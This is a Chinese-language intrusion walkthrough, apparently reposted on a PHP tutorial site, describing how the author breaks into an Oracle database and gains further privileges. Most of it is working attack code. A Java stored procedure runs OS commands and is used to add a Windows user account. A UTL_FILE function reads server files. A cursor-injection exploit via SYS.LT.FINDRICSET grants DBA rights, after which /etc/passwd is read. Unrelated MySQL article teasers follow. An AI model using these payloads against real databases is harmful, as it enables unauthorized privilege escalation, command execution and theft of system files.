入侵Oracle服务器进一步获取权限-mysql教程-PHP中文網

首頁

資料庫

mysql教程

入侵Oracle服务器进一步获取权限

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 07, 2016 pm 04:56 PM

oracle資料庫

很快便连接上Oracle服务器，此时发现： 1.连接后不是dba权限 2.不能利用SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_

　　很快便连接上Oracle服务器，此时发现：

　　1.连接后不是dba权限

　　2.不能利用SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES漏洞提升权限

　　3.运行SELECT UTL_HTTP.request(‘’) FROM dual 后发现oracle服务器不能连接网络。

　　幸运的是，

　　运行

　　create or replace function Linx_Query (p varchar2) return number authid current_user is begin execute immediate p; return 1;end;

　　成功!这个用户具有create proceduce权限。

　　此时马上想到创建java扩展执行命令：

　　create or replace and compile java source named “LinxUtil” as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str=”";while ((stemp = myReader.readLine()) != null) str +=stemp+” “;myReader.close();return str;} catch (Exception e){return e.toString();}}}

　　begin dbms_java.grant_permission(‘PUBLIC’, ‘SYS:java.io.FilePermission’, ‘’, ‘execute’ );end;

　　create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ‘LinxUtil.runCMD(java.lang.String) return String’

　　select * from all_objects where object_name like ‘%LINX%’

　　grant all on LinxRunCMD to public

　　select LinxRunCMD(‘cmd /c net user linx /add’) from dual

　　但是在第一步就卡住了，服务器由于某种未知原因不能创建java扩展!!

　　还好，我们还有UTL库可以利用：

　　create or replace function LinxUTLReadfile (filename varchar2) return varchar2 is

　　fHandler UTL_FILE.FILE_TYPE;

　　buf varchar2(4000);

　　output varchar2(8000);

　　BEGIN

　　fHandler := UTL_FILE.FOPEN(‘UTL_FILE_DIR’, filename, ‘r’);

　　loop

　　begin

　　utl_file.get_line(fHandler,buf);

　　DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||buf);

　　exception

　　when no_data_found then exit;

　　end;

　　output := output||buf||chr(10);

　　end loop;

　　UTL_FILE.FCLOSE(fHandler);

　　return output;

　　END;

　　UTL_FILE_DIR需要先用：

　　CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS ‘/etc’;

　　指定目。但运行后发现没有权限。只好想办法提权。

　　***************游标注射***************

　　老外写了N个pdf介绍这技术，，我精简了代码：

　　DECLARE

　　MYC NUMBER;

　　BEGIN

　　MYC := DBMS_SQL.OPEN_CURSOR;

　　DBMS_SQL.PARSE(MYC,’declare pragma autonomous_transaction; begin execute immediate ”GRANT DBA TO linxlinx_current_db_user”;commit;end;’,0);

　　DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||MYC);

　　BEGIN SYS.LT.FINDRICSET(‘.”||dbms_sql.execute( ‘||MYC||’ )||””)–’,'x’); END;

　　raise NO_DATA_FOUND;

　　EXCEPTION

　　WHEN NO_DATA_FOUND THEN DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||MYC);

　　WHEN OTHERS THEN DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||MYC);

　　END;

　　运行后重新连接就有dba权限了，简单吧……

　　现在可以读取文件了：

　　CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS ‘/etc’;

　　select LinxUTLReadfile(‘passwd’) from dual

　　后面就简单了，不写了。

linux

陳述

本文內容由網友自願投稿，版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容，請聯絡admin@php.cn

MySQL索引基數如何影響查詢性能？Apr 14, 2025 am 12:18 AM

MySQL索引基数对查询性能有显著影响：1.高基数索引能更有效地缩小数据范围，提高查询效率；2.低基数索引可能导致全表扫描，降低查询性能；3.在联合索引中，应将高基数列放在前面以优化查询。

MySQL：新用戶的資源和教程Apr 14, 2025 am 12:16 AM

MySQL學習路徑包括基礎知識、核心概念、使用示例和優化技巧。 1)了解表、行、列、SQL查詢等基礎概念。 2)學習MySQL的定義、工作原理和優勢。 3)掌握基本CRUD操作和高級用法，如索引和存儲過程。 4)熟悉常見錯誤調試和性能優化建議，如合理使用索引和優化查詢。通過這些步驟，你將全面掌握MySQL的使用和優化。

現實世界Mysql：示例和用例Apr 14, 2025 am 12:15 AM

MySQL在現實世界的應用包括基礎數據庫設計和復雜查詢優化。 1)基本用法：用於存儲和管理用戶數據，如插入、查詢、更新和刪除用戶信息。 2)高級用法：處理複雜業務邏輯，如電子商務平台的訂單和庫存管理。 3)性能優化：通過合理使用索引、分區表和查詢緩存來提升性能。

MySQL中的SQL命令：實踐示例Apr 14, 2025 am 12:09 AM

MySQL中的SQL命令可以分為DDL、DML、DQL、DCL等類別，用於創建、修改、刪除數據庫和表，插入、更新、刪除數據，以及執行複雜的查詢操作。 1.基本用法包括CREATETABLE創建表、INSERTINTO插入數據和SELECT查詢數據。 2.高級用法涉及JOIN進行表聯接、子查詢和GROUPBY進行數據聚合。 3.常見錯誤如語法錯誤、數據類型不匹配和權限問題可以通過語法檢查、數據類型轉換和權限管理來調試。 4.性能優化建議包括使用索引、避免全表掃描、優化JOIN操作和使用事務來保證數據一致性

InnoDB如何處理酸合規性？Apr 14, 2025 am 12:03 AM

InnoDB通過undolog實現原子性，通過鎖機制和MVCC實現一致性和隔離性，通過redolog實現持久性。 1）原子性：使用undolog記錄原始數據，確保事務可回滾。 2）一致性：通過行級鎖和MVCC確保數據一致。 3）隔離性：支持多種隔離級別，默認使用REPEATABLEREAD。 4）持久性：使用redolog記錄修改，確保數據持久保存。

MySQL的位置：數據庫和編程Apr 13, 2025 am 12:18 AM

MySQL在數據庫和編程中的地位非常重要，它是一個開源的關係型數據庫管理系統，廣泛應用於各種應用場景。 1）MySQL提供高效的數據存儲、組織和檢索功能，支持Web、移動和企業級系統。 2）它使用客戶端-服務器架構，支持多種存儲引擎和索引優化。 3）基本用法包括創建表和插入數據，高級用法涉及多表JOIN和復雜查詢。 4）常見問題如SQL語法錯誤和性能問題可以通過EXPLAIN命令和慢查詢日誌調試。 5）性能優化方法包括合理使用索引、優化查詢和使用緩存，最佳實踐包括使用事務和PreparedStatemen